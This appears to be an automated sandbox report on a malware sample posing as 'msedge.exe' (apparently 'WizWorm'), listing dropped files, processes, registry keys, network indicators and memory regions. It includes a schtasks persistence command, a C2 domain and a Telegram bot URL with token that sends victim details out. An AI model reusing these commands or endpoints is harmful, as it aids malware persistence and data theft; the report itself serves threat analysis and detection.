Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
msedge.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_2c2ca92dcd483d7a57334730825da1e95a3edac_e2b55a38_ee85a960-0b5e-4b89-bdc6-b3f5bd0c3ccc\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log
|
CSV text
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\msedge.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A3A.tmp.dmp
|
Mini DuMP crash report, 16 streams, Mon Dec 2 17:48:02 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D19.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D59.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Log.tmp
|
Generic INItialization configuration [WIN]
|
modified
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Dec 2 16:44:54
2024, mtime=Mon Dec 2 16:44:57 2024, atime=Mon Dec 2 16:44:57 2024, length=150016, window=hide
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\msedge.exe
|
"C:\Users\user\Desktop\msedge.exe"
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"
|
|
|
|
C:\Users\user\AppData\Local\msedge.exe
|
C:\Users\user\AppData\Local\msedge.exe
|
|
|
|
C:\Users\user\AppData\Local\msedge.exe
|
"C:\Users\user\AppData\Local\msedge.exe"
|
|
|
|
C:\Users\user\AppData\Local\msedge.exe
|
"C:\Users\user\AppData\Local\msedge.exe"
|
|
|
|
C:\Users\user\AppData\Local\msedge.exe
|
C:\Users\user\AppData\Local\msedge.exe
|
|
|
|
C:\Users\user\AppData\Local\msedge.exe
|
C:\Users\user\AppData\Local\msedge.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 6924 -s 1484
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://pastebin.com/raw/ZnhxAV6a
|
104.20.3.235
|
||
|
https://i.ibb.co/Dwrj41N/Image.png
|
91.134.9.160
|
||
|
http://upx.sf.net
|
unknown
|
||
|
https://i.ibb.co
|
unknown
|
||
|
http://i.ibb.co
|
unknown
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888&text=%E2%98%A0%20%5BWizWorm%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro
|
149.154.167.220
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
upon-forming.gl.at.ply.gg
|
147.185.221.24
|
|
|
|
api.telegram.org
|
149.154.167.220
|
||
|
pastebin.com
|
104.20.3.235
|
||
|
i.ibb.co
|
91.134.9.160
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
147.185.221.24
|
upon-forming.gl.at.ply.gg
|
United States
|
|
|
|
104.20.3.235
|
pastebin.com
|
United States
|
||
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
|
91.134.9.160
|
i.ibb.co
|
France
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
ProgramId
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
FileId
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
LowerCaseLongPath
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
LongPathHash
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
Name
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
OriginalFileName
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
Publisher
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
Version
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
BinFileVersion
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
BinaryType
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
ProductName
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
ProductVersion
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
LinkDate
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
BinProductVersion
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
AppxPackageFullName
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
AppxPackageRelativeId
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
Size
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
Language
|
|
|
|
\REGISTRY\A\{b2da9ca4-045e-5ca8-79fe-11276234446b}\Root\InventoryApplicationFile\msedge.exe|195bf76ad49c6bcc
|
Usn
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
msedge
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASMANCS
|
FileDirectory
|
There are 24 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
129D1000
|
trusted library allocation
|
page read and write
|
|
|
|
602000
|
unkown
|
page readonly
|
|
|
|
143B000
|
heap
|
page read and write
|
||
|
1BE8E000
|
stack
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
C70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
FC0000
|
heap
|
page read and write
|
||
|
1B380000
|
heap
|
page execute and read and write
|
||
|
B60000
|
heap
|
page read and write
|
||
|
12EA8000
|
trusted library allocation
|
page read and write
|
||
|
2A4B000
|
trusted library allocation
|
page read and write
|
||
|
1BF8E000
|
stack
|
page read and write
|
||
|
273C000
|
trusted library allocation
|
page read and write
|
||
|
F90000
|
heap
|
page read and write
|
||
|
1A9BD000
|
stack
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A1F000
|
stack
|
page read and write
|
||
|
958000
|
heap
|
page read and write
|
||
|
12433000
|
trusted library allocation
|
page read and write
|
||
|
10EC000
|
heap
|
page read and write
|
||
|
29C0000
|
heap
|
page execute and read and write
|
||
|
10EA000
|
heap
|
page read and write
|
||
|
761000
|
stack
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
|
D47000
|
heap
|
page read and write
|
||
|
1400000
|
trusted library allocation
|
page read and write
|
||
|
12EA3000
|
trusted library allocation
|
page read and write
|
||
|
13208000
|
trusted library allocation
|
page read and write
|
||
|
D88000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7AC000
|
heap
|
page read and write
|
||
|
D4F000
|
heap
|
page read and write
|
||
|
1CA89000
|
stack
|
page read and write
|
||
|
3F5000
|
heap
|
page read and write
|
||
|
1459000
|
heap
|
page read and write
|
||
|
1BA4A000
|
heap
|
page read and write
|
||
|
243C000
|
trusted library allocation
|
page read and write
|
||
|
AD0000
|
heap
|
page read and write
|
||
|
143D000
|
heap
|
page read and write
|
||
|
10E0000
|
heap
|
page read and write
|
||
|
F50000
|
trusted library allocation
|
page read and write
|
||
|
1C94C000
|
stack
|
page read and write
|
||
|
1B35E000
|
stack
|
page read and write
|
||
|
1ACBD000
|
stack
|
page read and write
|
||
|
7FFD9B754000
|
trusted library allocation
|
page read and write
|
||
|
1B1CF000
|
stack
|
page read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
D20000
|
heap
|
page read and write
|
||
|
1B48E000
|
stack
|
page read and write
|
||
|
D5C000
|
heap
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
1C0D9000
|
heap
|
page read and write
|
||
|
3211000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
|
D10000
|
heap
|
page read and write
|
||
|
312E000
|
stack
|
page read and write
|
||
|
B55000
|
heap
|
page read and write
|
||
|
31F0000
|
heap
|
page read and write
|
||
|
1C420000
|
heap
|
page execute and read and write
|
||
|
1C0C0000
|
heap
|
page read and write
|
||
|
E20000
|
heap
|
page read and write
|
||
|
BBD000
|
heap
|
page read and write
|
||
|
1116000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
1B110000
|
heap
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
|
10D5000
|
heap
|
page read and write
|
||
|
1B350000
|
heap
|
page read and write
|
||
|
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
D8B000
|
heap
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
600000
|
unkown
|
page readonly
|
||
|
2AC3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
1B0FF000
|
stack
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
2431000
|
trusted library allocation
|
page read and write
|
||
|
1B4B0000
|
heap
|
page read and write
|
||
|
1AD5E000
|
heap
|
page read and write
|
||
|
1CE21765000
|
heap
|
page read and write
|
||
|
1010000
|
heap
|
page read and write
|
||
|
12A28000
|
trusted library allocation
|
page read and write
|
||
|
F3E000
|
stack
|
page read and write
|
||
|
1B6BE000
|
stack
|
page read and write
|
||
|
D00000
|
heap
|
page execute and read and write
|
||
|
F95000
|
heap
|
page read and write
|
||
|
1B373000
|
heap
|
page execute and read and write
|
||
|
1C3BB000
|
stack
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
1300000
|
heap
|
page read and write
|
||
|
1B370000
|
heap
|
page execute and read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
1CE213F0000
|
heap
|
page read and write
|
||
|
977000
|
heap
|
page read and write
|
||
|
291F000
|
stack
|
page read and write
|
||
|
29D1000
|
trusted library allocation
|
page read and write
|
||
|
1BA2E000
|
stack
|
page read and write
|
||
|
1305000
|
heap
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
145D000
|
heap
|
page read and write
|
||
|
1E0000
|
unkown
|
page readonly
|
||
|
1B47E000
|
stack
|
page read and write
|
||
|
833000
|
heap
|
page read and write
|
||
|
1020000
|
heap
|
page read and write
|
||
|
1BA5E000
|
heap
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
1B86E000
|
stack
|
page read and write
|
||
|
950000
|
heap
|
page read and write
|
||
|
2E17000
|
trusted library allocation
|
page read and write
|
||
|
750000
|
heap
|
page execute and read and write
|
||
|
DE5000
|
heap
|
page read and write
|
||
|
1CE213E0000
|
heap
|
page read and write
|
||
|
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
|
F83000
|
heap
|
page read and write
|
||
|
1AE40000
|
heap
|
page execute and read and write
|
||
|
98D000
|
heap
|
page read and write
|
||
|
3201000
|
trusted library allocation
|
page read and write
|
||
|
145B000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB7D000
|
stack
|
page read and write
|
||
|
12B0000
|
trusted library allocation
|
page read and write
|
||
|
1AA00000
|
trusted library allocation
|
page read and write
|
||
|
1B77E000
|
stack
|
page read and write
|
||
|
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
|
981000
|
heap
|
page read and write
|
||
|
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
|
1420000
|
heap
|
page read and write
|
||
|
AF0000
|
heap
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
856000
|
heap
|
page read and write
|
||
|
1C750000
|
heap
|
page read and write
|
||
|
2A1C000
|
trusted library allocation
|
page read and write
|
||
|
2731000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C159000
|
heap
|
page read and write
|
||
|
B50000
|
heap
|
page read and write
|
||
|
2420000
|
heap
|
page read and write
|
||
|
E25000
|
heap
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
7FF4B7700000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D90000
|
heap
|
page execute and read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
1450000
|
heap
|
page read and write
|
||
|
1BCBE000
|
stack
|
page read and write
|
||
|
1B5BE000
|
stack
|
page read and write
|
||
|
1BA72000
|
heap
|
page read and write
|
||
|
2810000
|
heap
|
page read and write
|
||
|
7F5000
|
heap
|
page read and write
|
||
|
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C4000
|
heap
|
page read and write
|
||
|
1CE21480000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
31D0000
|
heap
|
page execute and read and write
|
||
|
2EB1000
|
trusted library allocation
|
page read and write
|
||
|
1B980000
|
heap
|
page read and write
|
||
|
2C90000
|
heap
|
page read and write
|
||
|
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A31000
|
trusted library allocation
|
page read and write
|
||
|
1090000
|
trusted library allocation
|
page read and write
|
||
|
1BC9F000
|
stack
|
page read and write
|
||
|
23FE000
|
stack
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
F30000
|
trusted library allocation
|
page read and write
|
||
|
1487000
|
heap
|
page read and write
|
||
|
2EA1000
|
trusted library allocation
|
page read and write
|
||
|
1C0D6000
|
heap
|
page read and write
|
||
|
2741000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
D15000
|
heap
|
page read and write
|
||
|
78C000
|
heap
|
page read and write
|
||
|
7FFD9B78B000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B920000
|
heap
|
page read and write
|
||
|
900000
|
heap
|
page read and write
|
||
|
2E03000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
D28000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
1BFB5000
|
stack
|
page read and write
|
||
|
65A5A7F000
|
stack
|
page read and write
|
||
|
B66000
|
heap
|
page read and write
|
||
|
1AFCE000
|
stack
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BA14000
|
heap
|
page read and write
|
||
|
2A2C000
|
trusted library allocation
|
page read and write
|
||
|
320C000
|
trusted library allocation
|
page read and write
|
||
|
161F000
|
stack
|
page read and write
|
||
|
1015000
|
heap
|
page read and write
|
||
|
A7E000
|
stack
|
page read and write
|
||
|
F80000
|
heap
|
page read and write
|
||
|
D44000
|
heap
|
page read and write
|
||
|
1B97C000
|
stack
|
page read and write
|
||
|
2720000
|
heap
|
page read and write
|
||
|
10B0000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
971000
|
heap
|
page read and write
|
||
|
1C41E000
|
stack
|
page read and write
|
||
|
1880000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
D20000
|
trusted library allocation
|
page read and write
|
||
|
2A2F000
|
trusted library allocation
|
page read and write
|
||
|
F20000
|
heap
|
page read and write
|
||
|
1B21F000
|
stack
|
page read and write
|
||
|
7CA000
|
heap
|
page read and write
|
||
|
D86000
|
heap
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
|
14E3000
|
heap
|
page read and write
|
||
|
1C0F3000
|
heap
|
page read and write
|
||
|
1CE21760000
|
heap
|
page read and write
|
||
|
FD5000
|
heap
|
page read and write
|
||
|
7FFD9B8F2000
|
trusted library allocation
|
page read and write
|
||
|
12A23000
|
trusted library allocation
|
page read and write
|
||
|
710000
|
trusted library allocation
|
page read and write
|
||
|
1C148000
|
heap
|
page read and write
|
||
|
1885000
|
heap
|
page read and write
|
||
|
1B250000
|
heap
|
page execute and read and write
|
||
|
12EA1000
|
trusted library allocation
|
page read and write
|
||
|
7C0000
|
heap
|
page read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
1CD8A000
|
stack
|
page read and write
|
||
|
F25000
|
heap
|
page read and write
|
||
|
AFC000
|
heap
|
page read and write
|
||
|
D5A000
|
heap
|
page read and write
|
||
|
12438000
|
trusted library allocation
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
16D5000
|
heap
|
page read and write
|
||
|
1CC88000
|
stack
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
1446000
|
heap
|
page read and write
|
||
|
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
|
C1E000
|
stack
|
page read and write
|
||
|
1040000
|
heap
|
page read and write
|
||
|
2E9F000
|
stack
|
page read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
13203000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B761000
|
trusted library allocation
|
page read and write
|
||
|
1BD80000
|
heap
|
page execute and read and write
|
||
|
D3C000
|
heap
|
page read and write
|
||
|
1C140000
|
heap
|
page read and write
|
||
|
1BB90000
|
heap
|
page read and write
|
||
|
13E0000
|
trusted library allocation
|
page read and write
|
||
|
F1F000
|
stack
|
page read and write
|
||
|
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
C20000
|
heap
|
page read and write
|
||
|
1BB2E000
|
stack
|
page read and write
|
||
|
1461000
|
heap
|
page read and write
|
||
|
2EAF000
|
trusted library allocation
|
page read and write
|
||
|
1CE21488000
|
heap
|
page read and write
|
||
|
9B9000
|
heap
|
page read and write
|
||
|
1B42D000
|
stack
|
page read and write
|
||
|
7FFD9B7CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
140F000
|
stack
|
page read and write
|
||
|
12F1000
|
stack
|
page read and write
|
||
|
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B6000
|
heap
|
page read and write
|
||
|
1B8F0000
|
heap
|
page execute and read and write
|
||
|
DE7000
|
heap
|
page read and write
|
||
|
2EAC000
|
trusted library allocation
|
page read and write
|
||
|
1C0B3000
|
stack
|
page read and write
|
||
|
2A21000
|
trusted library allocation
|
page read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
1C0E6000
|
heap
|
page read and write
|
||
|
F10000
|
heap
|
page read and write
|
||
|
A15000
|
heap
|
page read and write
|
||
|
65A578F000
|
unkown
|
page read and write
|
||
|
1CE21410000
|
heap
|
page read and write
|
||
|
1C0C8000
|
heap
|
page read and write
|
||
|
616000
|
unkown
|
page readonly
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
1CE214A8000
|
heap
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
B15000
|
heap
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
B1E000
|
heap
|
page read and write
|
||
|
1B67E000
|
stack
|
page read and write
|
||
|
DE1000
|
heap
|
page read and write
|
||
|
12431000
|
trusted library allocation
|
page read and write
|
||
|
1AEC0000
|
heap
|
page read and write
|
||
|
12AF000
|
stack
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
10D8000
|
heap
|
page read and write
|
||
|
1C450000
|
heap
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B7BE000
|
stack
|
page read and write
|
||
|
1AF5C000
|
stack
|
page read and write
|
||
|
730000
|
trusted library allocation
|
page read and write
|
||
|
2840000
|
heap
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
|
963000
|
heap
|
page read and write
|
||
|
97E000
|
stack
|
page read and write
|
||
|
F80000
|
heap
|
page read and write
|
||
|
12A21000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
F63000
|
trusted library allocation
|
page read and write
|
||
|
FA0000
|
heap
|
page read and write
|
||
|
7F2000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
1175000
|
heap
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
294E000
|
stack
|
page read and write
|
||
|
7FFD9B773000
|
trusted library allocation
|
page read and write
|
||
|
B34000
|
heap
|
page read and write
|
||
|
1BEBE000
|
stack
|
page read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7AE000
|
heap
|
page read and write
|
||
|
E3C000
|
stack
|
page read and write
|
||
|
12738000
|
trusted library allocation
|
page read and write
|
||
|
320F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
65A5709000
|
stack
|
page read and write
|
||
|
B62000
|
heap
|
page read and write
|
||
|
7C1000
|
heap
|
page read and write
|
||
|
1BDBD000
|
stack
|
page read and write
|
||
|
1178000
|
heap
|
page read and write
|
||
|
F60000
|
trusted library allocation
|
page read and write
|
||
|
98F000
|
heap
|
page read and write
|
||
|
7FFD9B902000
|
trusted library allocation
|
page read and write
|
||
|
1BA34000
|
heap
|
page read and write
|
||
|
12733000
|
trusted library allocation
|
page read and write
|
||
|
13201000
|
trusted library allocation
|
page read and write
|
||
|
1C14D000
|
heap
|
page read and write
|
||
|
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
12A4D000
|
trusted library allocation
|
page read and write
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
AF6000
|
heap
|
page read and write
|
||
|
C50000
|
trusted library allocation
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
16D0000
|
heap
|
page read and write
|
||
|
1440000
|
heap
|
page read and write
|
||
|
7FFD9B902000
|
trusted library allocation
|
page read and write
|
||
|
12731000
|
trusted library allocation
|
page read and write
|
||
|
2FDD000
|
trusted library allocation
|
page read and write
|
||
|
961000
|
stack
|
page read and write
|
||
|
1B0CE000
|
stack
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
2A49000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
10B8000
|
heap
|
page read and write
|
||
|
26CF000
|
stack
|
page read and write
|
||
|
8F1000
|
stack
|
page read and write
|
||
|
1118000
|
heap
|
page read and write
|
||
|
CD0000
|
heap
|
page read and write
|
||
|
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1428000
|
heap
|
page read and write
|
||
|
341000
|
stack
|
page read and write
|
||
|
1B78D000
|
stack
|
page read and write
|
||
|
1C0CB000
|
heap
|
page read and write
|
||
|
273F000
|
trusted library allocation
|
page read and write
|
||
|
EF1000
|
stack
|
page read and write
|
||
|
D35000
|
heap
|
page read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
E1F000
|
stack
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
7B0000
|
heap
|
page read and write
|
||
|
C2E000
|
unkown
|
page read and write
|
||
|
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
|
